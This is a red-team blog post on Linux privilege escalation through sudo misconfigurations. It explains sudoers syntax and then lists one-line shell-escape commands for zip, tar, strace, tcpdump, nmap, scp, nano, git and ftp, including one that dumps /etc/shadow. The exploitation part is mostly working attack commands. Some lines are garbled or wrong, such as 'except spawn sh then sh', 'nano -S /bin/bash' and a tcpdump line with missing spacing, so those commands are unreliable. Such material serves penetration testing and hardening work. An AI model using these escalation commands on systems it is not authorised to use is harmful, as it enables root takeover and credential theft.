Abusing SUDO Advance for Linux Privilege Escalation – RedTeam Tips

Web Services and API Penetration Testing Part #2
February 8, 2018
SecureLayer7 at Japan’s Code Blue International Conference, Nov 2018.
December 12, 2018

July 23, 2018

Abusing SUDO Advance for Linux Privilege Escalation

If you have a limited shell that has access to some programs using thesudocommand you might be able to escalate your privileges. here I show some of the binary which helps you to escalate privilege using the sudo command.

If you already read my previous article(Abusing Sudo) then you can skip starting 2 section and continue from 3 section(Exploiting SUDO).

But before Privilege Escalation let’s understand some sudoer file syntax and what is sudo command is? 😉

Index

  1. What is SUDO?
  2. Scenario.
  3. Sudoer FIle Syntax.
  4. Exploiting SUDO
    • zip
    • tar
    • strace
    • tcpdump
    • nmap
    • scp
    • except
    • nano & pico
    • git
    • ftp/gdb

What is SUDO ??

The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers file.


Scenario.

During Red Teaming, sometime we encounter some situation where in we need to escalate our privilege to root or other users. an attacker can take advantage of sudo permission to execute a shell.


Sudoer File Syntax.

root ALL=(ALL) ALL

Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.

The first part is the user, the second is the terminal from where the user can use the sudocommand, the third part is which users he may act as, and the last one is which commands he may run when using.sudo

touhid ALL= /sbin/poweroff

Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password.

touhid ALL = (root) NOPASSWD: /usr/bin/find

Explain 3:  The above command, make the user touhid can from any terminal, run the command find as root user without password.


Exploiting SUDO Users.

To Exploiting sudo user u need to find which command u have to allow.
sudo -l

The above command shows which command have allowed to the current user.

sudo list

Here sudo -l, Shows the user has all this binary allowed to do as on root user without password.

Let’s take a look at all binary one by one (which is mention in the index only) and Escalate Privilege to root user.


Using zip command

$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

Using tar command

$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash

Using strace command

$ sudo strace -o/dev/null /bin/bash

Using tcpdump command

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root

Using nmap command

$ echo "os.execute('/bin/sh')" > /tmp/shell.nse 
$ sudo nmap --script=/tmp/shell.nse

Using scp command


nbsp;sudo scp -S /path/yourscript x y

Using except command

$ sudo except spawn sh then sh

Using nano command

$ sudo nano -S /bin/bash

type your command and hit CTRL+T 

Using git command


nbsp;sudo git help status
type:  !/bin/bash

Using gdb/ftp command

$ sudo ftp

type :  !/bin/sh


That’s all for this post.

we really like if you comment and share others tricks with others.

 

Discover more from SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Subscribe now to keep reading and get access to the full archive.

Continue reading